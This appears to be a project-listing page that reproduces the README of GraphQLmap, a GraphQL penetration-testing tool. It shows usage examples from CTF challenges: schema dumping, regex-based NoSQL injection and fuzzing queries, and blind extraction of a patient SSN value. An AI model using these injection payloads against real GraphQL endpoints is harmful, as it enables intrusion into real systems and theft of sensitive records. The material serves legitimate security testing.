swisskyrepo / Graphqlmap
Licence: mit
GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.
Stars: ✭ 434
Programming Languages
python
139335 projects - #7 most used programming language
Projects that are alternatives of or similar to Graphqlmap
Ssrfmap
Automatic SSRF fuzzer and exploitation tool
Stars: ✭ 1,344 (+209.68%)
Mutual labels: hacktoberfest, pentest, ctf
Altair
✨⚡️ A beautiful feature-rich GraphQL Client for all platforms.
Stars: ✭ 3,827 (+781.8%)
Mutual labels: graphql, hacktoberfest
Parse Dashboard
A dashboard for managing your Parse Server Apps
Stars: ✭ 3,534 (+714.29%)
Mutual labels: graphql, hacktoberfest
Saleor Dashboard
A GraphQL-powered, single-page dashboard application for Saleor.
Stars: ✭ 278 (-35.94%)
Mutual labels: graphql, hacktoberfest
Apollo Elements
🚀🌛 Use the Launch Platform 👩🚀👨🚀
Stars: ✭ 278 (-35.94%)
Mutual labels: graphql, hacktoberfest
Graphback
Graphback - Out of the box GraphQL server and client
Stars: ✭ 323 (-25.58%)
Mutual labels: graphql, hacktoberfest
Flag-Capture
Solutions and write-ups from security-based competitions also known as Capture The Flag competition
Stars: ✭ 84 (-80.65%)
Mutual labels: sql-injection, ctf
Pentest Lab
Pentest Lab on OpenStack with Heat, Chef provisioning and Docker
Stars: ✭ 353 (-18.66%)
Mutual labels: pentest, ctf
Open Sauced
🍕 This is a project to identify your next open source contribution.
Stars: ✭ 352 (-18.89%)
Mutual labels: graphql, hacktoberfest
Wp Graphql Acf
WPGraphQL for Advanced Custom Fields
Stars: ✭ 358 (-17.51%)
Mutual labels: graphql, hacktoberfest
Gqless
a GraphQL client without queries
Stars: ✭ 3,569 (+722.35%)
Mutual labels: graphql, hacktoberfest
Wp Graphql
🚀 GraphQL API for WordPress
Stars: ✭ 3,097 (+613.59%)
Mutual labels: graphql, hacktoberfest
Vulcain
Fast and idiomatic client-driven REST APIs.
Stars: ✭ 3,190 (+635.02%)
Mutual labels: graphql, hacktoberfest
doubletap
A very loud but fast recon scan and pentest template creator for use in CTF's/OSCP/Hackthebox...
Stars: ✭ 23 (-94.7%)
Mutual labels: ctf, pentest
Gatsby Woocommerce Themes
⚡ A Gatsby Theme for WooCommerce E-commerce site Gatsby WooCommerce WordPress
Stars: ✭ 306 (-29.49%)
Mutual labels: graphql, hacktoberfest
Parse Server
API server module for Node/Express
Stars: ✭ 19,165 (+4315.9%)
Mutual labels: graphql, hacktoberfest
spellbook
Framework for rapid development and reusable of security tools
Stars: ✭ 67 (-84.56%)
Mutual labels: ctf, pentest
Cracker-Tool
All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. 🎭
Stars: ✭ 181 (-58.29%)
Mutual labels: sql-injection, pentest
Askql
AskQL is a query language that can express any data request
Stars: ✭ 352 (-18.89%)
Mutual labels: graphql, hacktoberfest
GraphQLmap
GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.
- Install
-
Features and examples
- Dump a GraphQL schema
- Interact with a GraphQL endpoint
- Execute GraphQL queries
- Autocomplete queries
- GraphQL field fuzzing
- NoSQL injection inside a GraphQL field
- SQL injection inside a GraphQL field
I ❤️ pull requests, feel free to improve this script :)
You can also contribute with a 🍻 IRL or using Github Sponsoring button.
Install
$ git clone https://github.com/swisskyrepo/GraphQLmap
$ python graphqlmap.py
_____ _ ____ _
/ ____| | | / __ \| |
| | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __
| | |_ | '__/ _` | '_ \| '_ \| | | | | | '_ ` _ \ / _` | '_ \
| |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
\_____|_| \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/
| | | |
|_| |_|
Author:Swissky Version:1.0
usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]]
optional arguments:
-h, --help show this help message and exit
-u URL URL to query : example.com/graphql?query={}
-v [VERBOSITY] Enable verbosity
--method [METHOD] HTTP Method to use interact with /graphql endpoint
--headers [HEADERS] HTTP Headers sent to /graphql endpoint
--json Send requests using POST and JSON
Features and examples
⚠️ Examples are based on several CTF challenges from HIP2019.
Connect to a graphql endpoint
python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}'
Dump a GraphQL schema
Use dump_new
to dump the GraphQL schema, this function will automaticly populate the "autocomplete" with the found fields.
🎥 Live Example
GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)
Query
doctor[]: email (String!),
doctors[Doctor]:
patients[Patient]:
patient[]: id (ID!),
allrendezvous[Rendezvous]:
rendezvous[]: id (ID!),
Doctor
id[ID]:
firstName[String]:
lastName[String]:
specialty[String]:
patients[None]:
rendezvous[None]:
email[String]:
password[String]:
[...]
Interact with a GraphQL endpoint
Write a GraphQL request and execute it.
GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}
{
"data": {
"doctors": [
{
"firstName": "Admin",
"id": "5d089c51dcab2d0032fdd08d",
"lastName": "Admin"
}
]
}
}
GraphQL field fuzzing
Use GRAPHQL_INCREMENT
and GRAPHQL_CHARSET
to fuzz a parameter.
🎥 Live Example
GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi!\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi$\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi%\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi(\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi)\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi*\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi+\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi,\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi-\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi.\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi/\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi0\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi1\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi?\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}
NoSQLi injection
Use BLIND_PLACEHOLDER
inside the query for the nosqli
function.
🎥 Live Example
GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
Charset > 0123456789abcdef-
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
GraphQLmap >
SQL injection
GraphQLmap > postgresqli
GraphQLmap > mysqli
GraphQLmap > mssqli
TODO
- Docker with vulnerable GraphQL
- Unit tests
- Handle node
{
user {
edges {
node {
username
}
}
}
}
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].